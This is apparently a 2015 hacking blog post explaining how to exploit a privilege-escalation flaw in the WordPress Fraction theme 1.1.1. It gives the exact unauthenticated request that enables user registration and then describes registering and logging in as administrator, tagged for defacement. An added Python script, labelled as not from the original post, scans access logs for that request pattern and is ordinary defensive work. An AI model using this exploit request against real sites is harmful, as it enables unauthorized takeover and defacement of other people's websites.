LinuxSec Exploit

Nothing is Ever Locked

WordPress Fraction Theme Version 1.1.1 Privilege Escalation

March 11, 2015 by Jack Wilder

This exploit is still fresh :p . It was only released yesterday on 1337day. OK, let's get straight to the tools and ingredients :3
Google Dorks :
USE YOUR BRAIN, BITCH !!

Vulnerability : /fraction-theme/functions/ajax.php

How to Exploit :
localhost/wordpress/wp-admin/admin-ajax.php?action=ot_save_options&users_can_register=1
If user registration was previously disabled, this request turns it on without authorization.

After that, open localhost/wordpress/wp-login.php?action=register

Check your email, enter the username and password, and you are logged in to the dashboard as Admin 🙂
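Added example (not from the original post): a check a site owner can run over web access logs to spot this request pattern, flagging `admin-ajax.php` calls with `action=ot_save_options` and any registration-page visit that follows from the same client. The log lines are constructed samples, and the Combined Log Format is an assumption about the server.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: client, timestamp, request line, status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [11/Mar/2015:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 12
203.0.113.9 - - [11/Mar/2015:10:02:13 +0000] "GET /wp-admin/admin-ajax.php?action=ot_save_options&users_can_register=1 HTTP/1.1" 200 1
203.0.113.9 - - [11/Mar/2015:10:02:40 +0000] "GET /wp-login.php?action=register HTTP/1.1" 200 2411
198.51.100.7 - - [11/Mar/2015:10:05:00 +0000] "GET /wp-login.php?action=register HTTP/1.1" 302 0
203.0.113.20 - - [11/Mar/2015:10:06:00 +0000] "GET /wp-admin/admin-ajax.php?users_can_register=1&action=ot%5Fsave%5Foptions HTTP/1.1" 200 1
"""

def parse(line):
    """Split one log line into (ip, timestamp, path, query params, status)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, _method, target, status = m.groups()
    url = urlsplit(target)
    # parse_qs percent-decodes, so an encoded action name is still matched
    params = {k: v[-1] for k, v in parse_qs(url.query, keep_blank_values=True).items()}
    return ip, ts, url.path.lower(), params, int(status)

def detect(log_text):
    """Return alerts for ot_save_options requests and follow-up registrations."""
    alerts, flagged = [], set()
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        ip, ts, path, params, _status = rec
        action = params.get("action", "")
        if path.endswith("/wp-admin/admin-ajax.php") and action == "ot_save_options":
            # Every other parameter is an option name the request tried to set
            changed = sorted(k for k in params if k != "action")
            alerts.append((ts, ip, "option-write", changed))
            flagged.add(ip)
        elif path.endswith("/wp-login.php") and action == "register" and ip in flagged:
            alerts.append((ts, ip, "register-after-option-write", []))
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Access logs record only the query string, so parameters sent in a request body need WAF or application-level logging to be covered by the same rule.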

That's all for this tutorial; hopefully it is useful.

Filed Under: WordPress Exploit Tagged With: Deface, Exploit, Hacking
